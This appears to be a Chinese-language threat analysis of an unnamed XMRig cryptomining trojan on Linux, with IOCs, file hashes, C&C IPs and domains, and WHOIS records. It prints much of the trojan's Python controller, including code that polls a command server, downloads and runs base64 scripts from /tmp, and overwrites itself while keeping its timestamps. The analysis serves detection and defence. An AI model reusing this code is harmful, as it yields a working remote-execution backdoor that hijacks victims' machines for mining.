木马简介
背景
碰到一个挖矿木马,谷歌搜索没有找到相关的资料,暂时命名为无名矿马,挖矿程序是开源的XMRig(编译好后名字为update)。整个控制端依靠一个随机名python文件。
rc.local中有/etc/update
样本相关文件
一个随机名字的python文件和一个随机名字的python命令文件,用来执行自己的Python脚本程序。这个脚本会和C&C Server通信,来传输指令获取script,运行,开始挖矿。
Python脚本主要恶意功能
代码片段一:
if __name__ == "__main__":
daemonize() #标准守护进程代码,不赘述
if not global_lock(VAR_LOCK): #脚本单例运行文件排他锁,也没有啥可写的
sys.exit(3)
d = Schedule() # 关键点,一个Schedule线程
d.start()
d.join()
代码片段二:
class Schedule(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.inited = False
self.time_alive = datetime.datetime.now()
self.time_update = datetime.datetime.now()
self.time_task = datetime.datetime.now()
self.s = None
self.sock_ref = 0
self.list_records = []
self.lock_records = thread.allocate_lock()
self.select_host = ""
self.select_port = ""
def init(self):
self.time_alive = datetime.datetime.now() + datetime.timedelta(minutes=1)
# self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=3)
self.time_task = datetime.datetime.now() + datetime.timedelta(minutes=1)
self.time_update = datetime.datetime.now() + datetime.timedelta(minutes=10)
self.inited = True
pass
def task_result(self, idx, result):
data = {'msg': 'task', 'id': idx, 'result': base64.b64encode(result)}
ops_send(self.s, data)
self.socket_close() # release sock
def task_exec(self, task_id, script, sync, timeout=None):
filename = gen_file_name()
f = open(filename, 'w')
f.write(script)
f.write("
")
f.close()
t = TaskExec(filename, sync, timeout, task_id)
if sync:
self.socket_connect()
t.set_cb(self.task_result)
t.run()
time.sleep(0.5)
try:
os.unlink(filename)
except:
pass
def socket_connect(self):
if not self.s:
self.s = sch_check_host()
if not self.s:
return None
self.sock_ref += 1
return self.s
def socket_close(self):
self.sock_ref -= 1
if self.sock_ref == 0:
self.s.close()
self.s = None
def alive(self):
sock = self.socket_connect()
if not sock:
return
data = {'msg': 'alive'}
result = ops_send(sock, data)
if not result:
self.socket_close()
return
result, response = ops_recv(sock)
if not result:
self.socket_close()
return
self.socket_close()
print response
if type(response) is not dict:
return
if 'delay' in response.keys():
self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
pass
def update(self):
sock = self.socket_connect()
if not sock:
return
data = {'msg': 'update'}
result = ops_send(sock, data)
if not result:
self.socket_close()
return
result, response = ops_recv(sock)
if not result:
self.socket_close()
return
self.socket_close()
print response
if type(response) is not dict:
return
if 'delay' in response.keys():
self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
if 'script' not in response.keys():
return
self_upgrade(response['script'])
def task(self):
sock = self.socket_connect()
if not sock:
return
data = {'msg': 'task'}
result = ops_send(sock, data)
if not result:
self.socket_close()
return
result, response = ops_recv(sock)
if not result:
self.socket_close()
return
self.socket_close()
print response
if type(response) is not dict:
return
if 'script' in response.keys():
self.task_exec(response['id'], base64.b64decode(response['script']), response['sync'], response['timeout'])
self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
def run(self):
while True:
if not self.inited:
self.init()
cur_time = datetime.datetime.now()
if cur_time > self.time_alive:
try:
self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=60)
self.alive()
except Exception, e:
pass
if cur_time > self.time_update:
try:
self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=60)
self.update()
except Exception, e:
pass
if cur_time > self.time_task:
try:
self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=60)
self.task()
except Exception, e:
pass
# self.task_result()
time.sleep(1)
可以看到一共执行三个有效通信函数:alive(),update(),task(),其中还涉及几个函数ops_send和ops_recv两个函数,都是socket通信,另外self_upgrade实现在我升级。self.task_exec()会下载矿马和配置文件运行开始挖矿。
def self_upgrade(script):
self_file = os.path.abspath(__file__)
ftime = (os.path.getctime(self_file), os.path.getmtime(self_file))
f = open(self_file, 'w')
f.write(script)
f.close()
os.utime(self_file, ftime)
subprocess.Popen("sh -c "chmod +x %s;kill -9 %d;%s"" % (self_file, os.getpid(), self_file), shell=True)
生成文件
通过代码可以看到,会在/tmp下生成sess_后面跟随机字符窜的文件,用来存储C&C Server发来的Payload,但是也会看到很多这类文件大小为0,应该是C&C,不会每次都传过来吧。
VAR_LOC = "/tmp"
VAR_PFX = "sess_"
VAR_LOCK = '/tmp/.%s.lock' % VAR_SIGN
...
def gen_file_name(path=VAR_LOC, prefix=VAR_PFX, length=26):
list_content = []
name = ""
charsets = [(97, 26), (48, 10)]
for (start, count) in charsets:
for i in range(0, count):
list_content.append(chr(start + i))
for i in range(0, length):
name += str(list_content[random.randint(0, len(list_content) - 1)])
index = random.randint(0, length - len(VAR_SIGN))
# name[index:index+4] = "oops"
name = name[:index] + VAR_SIGN + name[index + len(VAR_SIGN):]
return os.path.join(path, prefix + name)
网络通信行为
根据脚本运行抓包来看
与代码中的网络通信行为保持一致。
从代码和网络通信行为的结果来看可以看出获得IOC:
挖矿的配置都在config.json中
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": false, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 80, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 30, // print hashrate report every N seconds
"retries": 500, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "pool.minexmr.com:443", // URL of mining server
"user": "44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false, // enable nicehash/xmrig-proxy support
"variant": -1 // algorithm PoW variant
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}
IOC
文件名
py文件,可以根据域名检索,因为其名字会变,文件第一行的 #!/sbin/regdbdump 是随机路径和名字 所以hash值不统一;
引导Python脚本的文件,随机名称,hash值见下;
config.json hash值见下
/tmp/.ops.lock
文件hash值
update
MD5: D8D311F7822DDAB5888A59313224E0A4
SHA1: 27752629A75588C029F1AF191AB40DC0ECAF9C64
随机文件名的python运行命令文件
MD5: 6078CE87E5E2A7448AC192E2AB1CA2DF
SHA1: 00E7805857F2C7A944B86CDF29C33D7022CDC7B8
config.json
MD5: 107E4289A3AA1E3F499E8629D2FB4612
SHA1: CB67E8E8C1A7660FF77F83E9B54679AEBC7C710B
IP地址
167.88.176.177
103.224.81.48
103.19.3.166
118.193.149.7
Domain域名
kernelpatch.info
rhelupdate.info
whois信息
kernelpatch.info
% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object
refer: whois.afilias.net
domain: INFO
organisation: Afilias Limited
address: Office 107
address: 3013 Lake Drive
address: CityWest
address: Dublin 24
address: Ireland
contact: administrative
name: Ram Mohan
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domainadmin@afilias.info
contact: technical
name: Howard Eland
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domaintech@afilias.info
nserver: A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver: A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver: B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver: B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver: C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver: D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata: 8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata: 8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b
whois: whois.afilias.net
status: ACTIVE
remarks: Registration information: http://www.nic.info
created: 2001-06-26
changed: 2015-09-09
source: IANA
Domain Name: KERNELPATCH.INFO
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:51:08Z <<<
Domain Name: kernelpatch.info
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615890
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: kernelpatch.info@domainsbyproxy.com
Registry Admin ID: CR325615893
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: kernelpatch.info@domainsbyproxy.com
Registry Tech ID: CR325615892
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: kernelpatch.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<
rhelupdate.info
% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object
refer: whois.afilias.net
domain: INFO
organisation: Afilias Limited
address: Office 107
address: 3013 Lake Drive
address: CityWest
address: Dublin 24
address: Ireland
contact: administrative
name: Ram Mohan
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domainadmin@afilias.info
contact: technical
name: Howard Eland
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domaintech@afilias.info
nserver: A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver: A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver: B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver: B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver: C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver: D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata: 8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata: 8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b
whois: whois.afilias.net
status: ACTIVE
remarks: Registration information: http://www.nic.info
created: 2001-06-26
changed: 2015-09-09
source: IANA
Domain Name: RHELUPDATE.INFO
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:53:34Z <<<
Domain Name: rhelupdate.info
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615889
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: rhelupdate.info@domainsbyproxy.com
Registry Admin ID: CR325615894
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: rhelupdate.info@domainsbyproxy.com
Registry Tech ID: CR325615891
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: rhelupdate.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<